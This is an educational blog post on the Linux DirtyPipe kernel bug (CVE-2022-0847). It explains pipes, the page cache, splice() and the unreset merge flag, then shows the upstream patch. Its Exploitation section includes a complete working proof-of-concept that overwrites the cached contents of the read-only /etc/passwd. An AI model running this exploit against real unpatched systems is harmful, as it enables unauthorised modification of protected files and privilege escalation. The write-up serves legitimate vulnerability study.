null@nothing $

Exploring kernel exploitation and reverse engineering.

19 October 2025

DirtyPipe-CVE-2022-0847

by 0xnull007

One of my friends, stdnoerr, wrote a blog about his N-day research on DirtyPipe (CVE-2022-0847). As a noob in kernel exploitation, I realized that I should be familiar with some Linux kernel internals to fully understand his blog. So I decided to explore those internals and write about my journey so others like me could benefit. This post will cover only the internals necessary to understand the DirtyPipe vulnerability and its exploitation. We’ll go through the important kernel structures in sequence and then merge them at the end to get the complete picture.

Pipe

The first and most important kernel concept/structure involved in this vulnerability is a pipe. A pipe is a unidirectional inter-process communication (IPC) mechanism found in UNIX-like operating systems. In essence, a pipe is a buffer in kernel space that processes access through file descriptors. You might have used it in your shell commands like:

cat /proc/cpuinfo | grep "address size"

Here, the | operator creates a pipe (a buffer in kernel space). The output of cat is written into this pipe, and the input of grep is read from the same pipe. Such a pipe can be created programmatically using the syscall pipe(), which returns two file descriptors — one for reading and the other for writing.
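To make the two file descriptors concrete, here is a minimal sketch that pushes a string through a fresh pipe and reads it back. The helper name pipe_roundtrip is made up for this post; only pipe(), write(), read(), and close() are real calls.

```c
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: sends msg through a fresh pipe and reads it back.
 * Returns the number of bytes read, or -1 on error. */
ssize_t pipe_roundtrip(const char *msg, char *out, size_t out_size) {
    int pipefd[2];   /* pipefd[0]: read end, pipefd[1]: write end */
    if (pipe(pipefd) == -1)
        return -1;

    ssize_t n = -1;
    size_t len = strlen(msg);
    if (out_size > 0 && write(pipefd[1], msg, len) == (ssize_t)len) {
        n = read(pipefd[0], out, out_size - 1);
        if (n >= 0)
            out[n] = '\0';   /* read() does not null-terminate */
    }
    close(pipefd[0]);
    close(pipefd[1]);
    return n;
}
```

Calling pipe_roundtrip("hello", out, sizeof(out)) from main() should fill out with the same five bytes that went in.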

In Linux, every file is represented by a special data structure called an inode, which stores important information about the file (such as its type, size, and permissions). Pipes in the Linux kernel are built on top of the virtual filesystem (VFS). When you create a pipe, the two file descriptors you get point to two pseudo files with different permissions — one read-only and the other write-only — but both share a single inode. This inode has a field called i_pipe, which points to a kernel structure named pipe_inode_info. This structure is what the kernel uses to manage the actual metadata of a pipe.

Key Data Structures

  1. struct pipe_inode_info
    • Tracks read/write positions, buffers, and synchronization.
    • bufs: an array of struct pipe_buffer, each representing a memory page storing pipe data.
    • ring_size: size of the array bufs.
  2. struct pipe_buffer
    • page: pointer to struct page describing where the actual data held by the pipe_buffer is stored.
    • offset, len: track where valid data exists in the page.
    • ops: Operations table (pipe_buf_operations) for managing the buffer.

Operations on a Pipe

Pipe Creation (pipe())

  1. pipe()/pipe2() syscall → do_pipe2() → __do_pipe_flags()
  2. Allocates a struct pipe_inode_info via alloc_pipe_info().
  3. Creates two file descriptors (read & write ends) via get_unused_fd_flags().
  4. Initializes 16 pipe buffers by default (PIPE_DEF_BUFFERS). Each pipe_buffer has one page associated with it, so the total capacity of the pipe is ring_size * PAGE_SIZE bytes (ring_size * 4096 with 4 KiB pages). A process can get and set this capacity, in bytes, using the fcntl() system call with the F_GETPIPE_SZ and F_SETPIPE_SZ commands, respectively.
    • ring_size is always a power of 2. That means if we request room for 3 pages, the kernel will automatically round it up to the next power of two, which is 4.
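The rounding is easy to observe from user space. The sketch below asks for a capacity and reports what the kernel actually granted. The helper name resize_pipe is hypothetical; F_SETPIPE_SZ and F_GETPIPE_SZ are the real fcntl() commands and need _GNU_SOURCE.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper: asks for a pipe capacity of `requested` bytes and
 * returns the capacity the kernel actually granted, or -1 on error. */
long resize_pipe(size_t requested) {
    int pipefd[2];
    if (pipe(pipefd) == -1)
        return -1;

    long granted = -1;
    if (fcntl(pipefd[1], F_SETPIPE_SZ, (int)requested) != -1)
        granted = fcntl(pipefd[1], F_GETPIPE_SZ);

    close(pipefd[0]);
    close(pipefd[1]);
    return granted;
}
```

On a system with 4 KiB pages, resize_pipe(3 * 4096) should come back as 16384, i.e. four slots rather than three.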

Writing to a Pipe (write())

  1. write() syscall → vfs_write() → pipe_write().
  2. If the pipe is full, the writer sleeps until space is available.
  3. Kernel allocates a page (if needed) and copies data from user space.
  4. Updates pipe_buffer’s offset, len, and flags.
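To see the "pipe is full" case without putting the writer to sleep, we can open the pipe in non-blocking mode and write page-sized chunks until the kernel refuses. This is only a sketch: fill_pipe_until_full is a made-up helper, and the total it reports depends on the pipe's current ring size.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical helper: fills a fresh non-blocking pipe one page at a time
 * and returns how many bytes fit before write() fails with EAGAIN.
 * Returns -1 on any other error. */
long fill_pipe_until_full(void) {
    int pipefd[2];
    if (pipe2(pipefd, O_NONBLOCK) == -1)
        return -1;

    long page = sysconf(_SC_PAGESIZE);
    char *chunk = calloc(1, (size_t)page);
    long total = -1;
    if (chunk != NULL) {
        total = 0;
        for (;;) {
            ssize_t n = write(pipefd[1], chunk, (size_t)page);
            if (n > 0) {
                total += n;          /* one more pipe_buffer slot is in use */
                continue;
            }
            if (n == -1 && errno != EAGAIN)
                total = -1;          /* a real error, not just "pipe full" */
            break;
        }
        free(chunk);
    }
    close(pipefd[0]);
    close(pipefd[1]);
    return total;
}
```

With the default 16 buffers, the result should normally be 16 pages' worth of bytes, matching the capacity described in the pipe creation steps.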

Reading from a Pipe (read())

  1. read() syscall → vfs_read() → pipe_read().
  2. If the pipe is empty, the reader sleeps until data arrives.
  3. Kernel copies data from the pipe_buffer page to user space.
  4. If the buffer is fully consumed, the page is freed or marked for reuse.
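The sleeping behaviour in step 2 can be made visible with a non-blocking pipe: instead of sleeping, read() fails with EAGAIN. A small sketch, where empty_pipe_would_block is a hypothetical helper name:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if reading from an empty non-blocking pipe
 * fails with EAGAIN (where a blocking reader would sleep), 0 if it does not,
 * and -1 if the pipe could not be created. */
int empty_pipe_would_block(void) {
    int pipefd[2];
    char byte;
    if (pipe2(pipefd, O_NONBLOCK) == -1)
        return -1;

    ssize_t n = read(pipefd[0], &byte, 1);
    int would_block = (n == -1 && errno == EAGAIN);

    close(pipefd[0]);
    close(pipefd[1]);
    return would_block;
}
```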

The array bufs in struct pipe_inode_info is a circular array (or ring buffer): once the last slot has been used, the next buffer wraps around to slot 0.
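A toy user-space model helps picture the wrap-around. It assumes head and tail counters that only ever increase and are masked with ring_size - 1 on access, which is how recent 5.x kernels index the ring. The struct and function names are invented for this sketch, and the real struct pipe_inode_info has many more fields.

```c
#include <stddef.h>

#define RING_SIZE 16u   /* must be a power of two, like ring_size */

/* Simplified model: each slot holds an int instead of a struct pipe_buffer. */
struct ring_model {
    unsigned int head;   /* next slot a writer fills */
    unsigned int tail;   /* next slot a reader drains */
    int slots[RING_SIZE];
};

static unsigned int ring_used(const struct ring_model *r) {
    return r->head - r->tail;
}

/* Returns 0 on success, -1 if every slot is occupied. */
int ring_push(struct ring_model *r, int value) {
    if (ring_used(r) >= RING_SIZE)
        return -1;
    r->slots[r->head & (RING_SIZE - 1)] = value;   /* mask gives the wrap-around */
    r->head++;
    return 0;
}

/* Returns 0 on success, -1 if the ring is empty. */
int ring_pop(struct ring_model *r, int *value) {
    if (r->head == r->tail)
        return -1;
    *value = r->slots[r->tail & (RING_SIZE - 1)];
    r->tail++;
    return 0;
}
```

After 16 pushes the ring is full; one pop frees slot 0, and the 17th push lands in slot 0 again.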

Page Cache

The page cache plays an important role in the Dirty Pipe vulnerability, so let’s see what it is and how it works. The page cache is a kernel-managed memory region that stores recently accessed file data and disk blocks in RAM. It can be thought of as a caching layer for file I/O to speed it up.

According to the Linux kernel documentation:

The physical memory is volatile, and the common case for getting data into memory is to read it from files. Whenever a file is read, the data is put into the page cache to avoid expensive disk access on subsequent reads. Similarly, when one writes to a file, the data is placed in the page cache and eventually written to the backing storage device. The written pages are marked as dirty, and when Linux decides to reuse them for other purposes, it makes sure to synchronize the file contents on the device with the updated data. source

The kernel doesn’t just store recently accessed file data in the page cache—it also uses an optimization mechanism called read-ahead, which observes access patterns, predicts which pages you’ll need next, and loads them into memory in advance. So, if you are reading a file sequentially, the kernel will pre-load the remaining pages of that file into memory as well.

Because of this caching layer, if any process on the system (or the kernel itself) requests data from a file that is already cached, the cached data is used instead of accessing the disk. This default behavior can be changed by using the flags (O_DIRECT | O_SYNC) when opening a file. However, in most situations, the cached data is what the kernel—and therefore user processes—actually use.

Whenever a file is opened, the kernel keeps its metadata in a struct inode. Among that metadata is a field named i_mapping, a pointer to a struct address_space, which indexes the page-cache pages that hold that file’s data.

page_cache.svg
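From user space we can get a rough hint about whether a file's first page is sitting in the page cache by mapping it and asking mincore(). This is a sketch under assumptions: first_page_cached is a made-up helper, and newer kernels may report pages as resident unconditionally for files the caller could not write to, so treat the answer as a hint only.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if the first page of `path` is reported as
 * resident in memory, 0 if it is not, and -1 on error. */
int first_page_cached(const char *path) {
    int fd = open(path, O_RDONLY);
    if (fd == -1)
        return -1;

    long page = sysconf(_SC_PAGESIZE);
    int result = -1;
    void *map = mmap(NULL, (size_t)page, PROT_READ, MAP_SHARED, fd, 0);
    if (map != MAP_FAILED) {
        unsigned char vec = 0;
        if (mincore(map, (size_t)page, &vec) == 0)
            result = vec & 1;   /* low bit set: page is resident */
        munmap(map, (size_t)page);
    }
    close(fd);
    return result;
}
```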

splice() syscall

The splice syscall is part of the zero-copy system calls in the Linux kernel. Zero-copy syscalls allow data to be transferred between kernel objects (such as files, sockets, and pipes) without copying the data into or out of user-space memory.

Let’s make this clearer with a scenario where we want to copy the contents of a file into a pipe. The naive approach would be to open and read the contents of that file into a user buffer and then write that buffer’s contents into a pipe. The following diagram shows the steps involved in this approach:

read_write_pipe.svg

We can see that to copy the data from a file into a pipe, we first have to copy it into a user-space buffer, which is redundant and costly. The splice syscall eliminates this step by reusing the page cache where the file’s data is already cached. Instead of copying the data from the page cache to a user buffer, it stores a pointer to the cached page in the page field of the pipe_buffer. The following diagram illustrates this:

pipe_page_cache.svg
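For comparison, the naive approach from the first diagram might look like the sketch below, with the two copies marked. The helper name copy_file_to_pipe_naive and the 4096-byte bounce buffer are choices made for this illustration only.

```c
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper: copies up to `len` bytes (capped at 4096) from `path`
 * into the pipe's write end through a user-space bounce buffer.
 * Returns the number of bytes written to the pipe, or -1 on error. */
ssize_t copy_file_to_pipe_naive(const char *path, int pipe_wfd, size_t len) {
    char bounce[4096];
    if (len > sizeof(bounce))
        len = sizeof(bounce);

    int fd = open(path, O_RDONLY);
    if (fd == -1)
        return -1;

    ssize_t n = read(fd, bounce, len);            /* copy 1: page cache -> user buffer */
    close(fd);
    if (n <= 0)
        return n;
    return write(pipe_wfd, bounce, (size_t)n);    /* copy 2: user buffer -> pipe page */
}
```

splice() removes both copies for this case: the pipe buffer simply ends up pointing at the cached page.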

Let’s see what the man page of the splice syscall says:

SPLICE(2)                       Linux Programmer's Manual                      

NAME
       splice - splice data to/from a pipe

SYNOPSIS
       #define _GNU_SOURCE         /* See feature_test_macros(7) */
       #include <fcntl.h>
       ssize_t splice(int fd_in, off64_t *off_in, int fd_out,
                      off64_t *off_out, size_t len, unsigned int flags);
DESCRIPTION
       splice() moves data between two file descriptors without copying between
       kernel address space and user address space. It transfers up to len bytes
       of data from the file descriptor fd_in to the file descriptor fd_out,
       where one of the file descriptors must refer to a pipe.

The following semantics apply for fd_in and off_in:
    * If fd_in refers to a pipe, then off_in must be NULL.
    * If fd_in does not refer to a pipe and off_in is NULL, then bytes are read
      from fd_in starting from the file offset, and the file offset is adjusted
      appropriately.
    * If fd_in does not refer to a pipe and off_in is not NULL, then off_in must
      point to a buffer specifying the starting offset from which bytes will be
      read from fd_in; in this case, the file offset of fd_in is not changed.

Analogous statements apply for fd_out and off_out.

One important thing to note from the description above is that one of the two file descriptors passed to the splice syscall must refer to a pipe. Let’s take a simple example to understand splice() in action.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

#define TARGET_FILE "./f1"

int main() {
    int fd;
    int pipefd[2];
    char buffer[256];

    // 1. Create pipe and open target file
    if (pipe(pipefd) == -1) {
        perror("pipe");
        return 1;
    }

    if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
        perror("open");
        return 1;
    }
    
    // 2. Splice the file
    if (splice(fd, NULL, pipefd[1], NULL, sizeof(buffer), 0) < 0) {
        perror("splice");
        close(fd);
        close(pipefd[0]);
        close(pipefd[1]);
        return 1;
    }
   
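    // 3. Read the spliced bytes back out of the pipe
    ssize_t n = read(pipefd[0], buffer, sizeof(buffer) - 1);
    if (n < 0) {
        perror("read");
        return 1;
    }
    buffer[n] = '\0'; // read() does not null-terminate
    printf("Data read from target file: %s\n", buffer);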

    close(fd);
    close(pipefd[0]);
    close(pipefd[1]);
    return 0;
}

The above code snippet opens a file f1 and splices it into the pipe, so the pipe buffer now refers to the page cache of f1. We can then perform a read on the pipe to get the file contents.
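The off_in rules from the man page are worth trying out as well. In the sketch below (splice_at is a hypothetical wrapper), we pass an explicit offset, so the bytes come from that position and the file descriptor's own offset should stay where it was.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical wrapper: splices `len` bytes of `fd`, starting at `offset`,
 * into the pipe write end. Returns the number of bytes spliced, or -1. */
ssize_t splice_at(int fd, off64_t offset, int pipe_wfd, size_t len) {
    off64_t off = offset;   /* the kernel advances this copy, not fd's file offset */
    return splice(fd, &off, pipe_wfd, NULL, len, 0);
}
```

For a file containing 0123456789, splice_at(fd, 4, pipefd[1], 3) should place 456 in the pipe, while lseek(fd, 0, SEEK_CUR) still reports the offset the descriptor had before the call.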

Writing to a Pipe

Understanding how data is written to a pipe is essential to understanding and exploiting this vulnerability. When a process writes data into a pipe, the kernel eventually calls the pipe_write() function. This function is responsible for copying data from user space into one or more pipe buffers, the circular array that forms the core of every pipe. If the pipe already holds data, pipe_write() first looks at the most recently filled pipe buffer (the slot just behind the head of the ring) and tries to merge the new data into it. So, if there is space left in that buffer’s page, new data will be appended there instead of consuming a fresh slot.

However, this is a problem for zero-copy. As mentioned, a zero-copy operation stores a reference to the file’s page rather than a copy of it. A page referenced this way must never be modified through the pipe; otherwise the kernel would have to fall back to copying the whole page instead of just the pointer. Why the kernel must prevent modification will become clear shortly. The normal write behavior therefore needed a guard, so a flag was introduced to specify whether new data may be appended to a buffer.

This merge decision is made based on the following condition (simplified):

if (buf->flags & PIPE_BUF_FLAG_CAN_MERGE) {
    // append new data into existing pipe buffer
}

The PIPE_BUF_FLAG_CAN_MERGE flag indicates whether the existing pipe_buffer can safely accept more data — meaning the new data can be written directly into the same underlying page without breaking isolation or corrupting shared memory.

Now, answering the question above: suppose process A reads f1.txt, and the file’s contents are loaded into the page cache. If process B then uses splice() to move data from f1.txt into a pipe without copying, the pipe buffer will point directly to the same cached page that process A populated. If process B subsequently writes into that pipe buffer, it will overwrite the shared cached page, and with it the file contents that every other process sees, even if that file was read-only. To protect against this, the pipe implementation uses a flag called PIPE_BUF_FLAG_CAN_MERGE. For buffers backed by a file’s page cache, this flag must be cleared (set to 0), which prevents future writes from being merged into that buffer.

Vulnerability

To pinpoint what went wrong, let’s trace the splice(file → pipe) call path within the Linux kernel. The journey begins at sys_splice(), the system call entry point. It primarily resolves user-supplied file descriptors into struct fd objects and then invokes __do_splice(), which looks up the corresponding struct pipe_inode_info for the pipe, copies the file offset (if any) from user space into kernel space, and then calls do_splice(). do_splice() determines the splice direction (e.g., file → pipe, pipe → file, or pipe → pipe) and dispatches to the appropriate helper function based on the source and destination types.

In the Dirty Pipe case, data is being spliced from a file to a pipe, so splice_file_to_pipe() is used. This function invokes the file’s splice_read callback defined in its struct file_operations. For regular files, this callback points to generic_file_splice_read(), which internally calls the standard read path (read_iter() → generic_file_read_iter()).

generic_file_read_iter() uses the page cache to serve reads efficiently. Inside, it calls filemap_read(), which fetches the file’s backing pages from the page cache and hands them off to copy_page_to_iter(). After performing necessary checks, execution reaches copy_page_to_iter_pipe(), where the current pipe buffer slot is obtained from the pipe’s buffer array and the page cache page is attached to it directly — without copying any data.

This means the pipe buffer now holds a reference to the same struct page that backs the file’s page cache. The following diagram illustrates this entire flow.

splice.svg

In the copy_page_to_iter_pipe() function, the following code snippet copies the page reference and updates the pipe_buffer struct. One important thing to note is that the flags member of buf, which contains the PIPE_BUF_FLAG_CAN_MERGE bit, is never reset to 0 here, so the slot keeps whatever value it held before and future writes to this buffer are not prevented.

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;

The Dirty Pipe vulnerability occurred because copy_page_to_iter_pipe() could leave pipe_buffer->flags uninitialized; a stale nonzero value there could incorrectly indicate that merging was allowed, permitting writes that modified file-backed cache pages. Now, to trigger this vulnerability, we must splice into a pipe buffer whose PIPE_BUF_FLAG_CAN_MERGE is already set. We can set this flag simply by writing into an anonymous (normal) pipe, because pipe_write() sets that flag on each new buffer it fills. Reading from the pipe afterwards does not unset the flag.
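The whole sequence can be replayed in a tiny user-space model. Nothing here is kernel code: the struct, the function names, and the CAN_MERGE value are stand-ins invented for this sketch, and each model_ function only imitates the one effect of its kernel counterpart that matters for the bug.

```c
#include <string.h>

#define CAN_MERGE 0x10u   /* stand-in for PIPE_BUF_FLAG_CAN_MERGE */

struct slot { char *page; unsigned int offset, len, flags; };

/* pipe_write() filling a fresh slot with an anonymous page: marks it mergeable. */
static void model_write_new(struct slot *s, char *anon, const char *data, unsigned int n) {
    memcpy(anon, data, n);
    s->page = anon; s->offset = 0; s->len = n; s->flags = CAN_MERGE;
}

/* pipe_read() draining the slot: the page is released, flags are left behind. */
static void model_drain(struct slot *s) { s->page = NULL; s->len = 0; }

/* copy_page_to_iter_pipe(): attaches the cached page; only the patched
 * variant resets flags. */
static void model_splice(struct slot *s, char *cached, unsigned int offset,
                         unsigned int bytes, int patched) {
    if (patched)
        s->flags = 0;
    s->page = cached; s->offset = offset; s->len = bytes;
}

/* pipe_write() on a non-empty pipe: returns 1 if it merged into the slot's page. */
static int model_write_merge(struct slot *s, const char *data, unsigned int n) {
    if (!(s->flags & CAN_MERGE))
        return 0;
    memcpy(s->page + s->offset + s->len, data, n);
    s->len += n;
    return 1;
}

/* Replays write, drain, splice, write. Returns 1 if the "cached" page changed. */
int model_dirty_pipe(int patched) {
    char anon[64] = {0};
    char cached[64] = "root:x:0:0:root";
    struct slot s = {0};

    model_write_new(&s, anon, "A", 1);
    model_drain(&s);
    model_splice(&s, cached, 0, 1, patched);
    model_write_merge(&s, "XXXX", 4);
    return strcmp(cached, "root:x:0:0:root") != 0;
}
```

model_dirty_pipe(0) reports that the cached page was modified, while model_dirty_pipe(1), which clears the flags during the splice step, leaves it intact. Note that even in the unpatched run the first byte of the page survives, because the merged write starts after the one spliced byte.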

Exploitation

To exploit this vulnerability, we need to allocate a pipe and open a file to which we have only read access, so we can test whether we can actually write to it. Before splicing that file, we must ensure that PIPE_BUF_FLAG_CAN_MERGE is set on the pipe buffer the splice will land in. To set that flag, we will write to the pipe and then read from it. This drains the pipe and frees the pages, but the flag remains set.

By default, a pipe has 16 buffers and each can hold 4096 bytes. For simplicity, we can change the pipe size to reduce the number of pipe buffers to 1, which helps us reach the goal faster. One important thing to note is that draining this single pipe buffer completely is mandatory before splicing a file into it.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

#define TARGET_FILE "/etc/passwd"

int main() {
    int fd;
    int pipefd[2];
    char buffer[4096];

    // 1. Create pipe and open target file
    if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
        perror("open");
        return 1;
    }

    if (pipe(pipefd) == -1) {
        perror("pipe");
        return 1;
    }

    // 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
    fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
    write(pipefd[1], buffer, sizeof(buffer));
    read(pipefd[0], buffer, sizeof(buffer));

    return 0;
}

Since the path to the vulnerable function copy_page_to_iter_pipe() is via splice and goes through splice_file_to_pipe(), we will perform a splice from the target file to the pipe. Because copy_page_to_iter_pipe() will obtain the file’s cached page, the buffer’s page will be replaced with the file’s. Subsequent writes to the pipe should modify the file’s page, even though the file is read-only. We splice just 1 byte, the smallest length that still attaches the page to the pipe buffer.

    // 3. Trigger the vulnerability via splice
    if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
        perror("splice");
        close(fd);
        close(pipefd[0]);
        close(pipefd[1]);
        return 1;
    }

At this point, the file’s cached page is being used as the pipe_buffer’s backing page. Now, writing to the pipe should overwrite the file’s content. The following is the complete proof-of-concept.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

#define TARGET_FILE "/etc/passwd"

int main() {
    int fd;
    int pipefd[2];
    char buffer[4096];

    // 1. Create pipe and open target file
    if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
        perror("open");
        return 1;
    }

    if (pipe(pipefd) == -1) {
        perror("pipe");
        return 1;
    }

    // 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
    fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
    write(pipefd[1], buffer, sizeof(buffer));
    read(pipefd[0], buffer, sizeof(buffer));

    // 3. Trigger the vulnerability via splice
    if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
        perror("splice");
        close(fd);
        close(pipefd[0]);
        close(pipefd[1]);
        return 1;
    }

    // 4. Overwrite the target file
    write(pipefd[1], "0xnull007", 9);

    lseek(fd, 0, SEEK_SET);
    read(fd, buffer, 60);
    buffer[60] = '\0'; // Null-terminate the buffer

    printf("Data read from target file: %s\n", buffer);

    return 0;
}

Limitations

DirtyPipe has a few limitations:

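  1. It cannot overwrite the first byte of a page, because at least one byte of that page has to be spliced into the pipe first.
  2. It cannot write more than PAGE_SIZE - 1 bytes at a time, because a merged write cannot cross a page boundary.
  3. It cannot overwrite memory pages; the data to be overwritten must be on disk.
  4. It cannot write more contents than the file’s original size, because the file itself is never resized.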
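Limitations 1, 2, and 4 boil down to a little arithmetic on the target offset. The check below is a sketch, assuming the first-byte rule applies to every page (since one byte of the page must be spliced before the write). The function name and parameters are hypothetical.

```c
#include <stddef.h>

/* Hypothetical helper: returns 1 if overwriting `len` bytes at file offset
 * `offset` stays within the limits listed above, otherwise 0. */
int dirty_pipe_write_allowed(size_t offset, size_t len,
                             size_t file_size, size_t page_size) {
    if (len == 0 || page_size == 0)
        return 0;
    if (offset % page_size == 0)
        return 0;   /* the first byte of a page cannot be overwritten */
    if (offset % page_size + len > page_size)
        return 0;   /* the write would cross a page boundary */
    if (offset + len > file_size)
        return 0;   /* the file cannot grow */
    return 1;
}
```

For example, with 4096-byte pages, writing 9 bytes at offset 1 of a 100-byte file passes the check, but the same write at offset 0 or at offset 95 does not.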

Patch

Now, let’s see the patch commit for this vulnerability. We can see that they initialized the flags member to 0 in both functions where it wasn’t initialized. This means that whenever a file is spliced into the pipe, its PIPE_BUF_FLAG_CAN_MERGE flag will be set to 0, preventing it from being overwritten.

diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index b0e0acdf96c15e..6dd5330f7a9957 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
 		return 0;
 
 	buf->ops = &page_cache_pipe_buf_ops;
+	buf->flags = 0;
 	get_page(page);
 	buf->page = page;
 	buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
 			break;
 
 	buf->ops = &default_pipe_buf_ops;
+	buf->flags = 0;
 	buf->page = page;
 	buf->offset = 0;
 	buf->len = min_t(ssize_t, left, PAGE_SIZE);

tags: DirtyPipe - CVE-2022-0847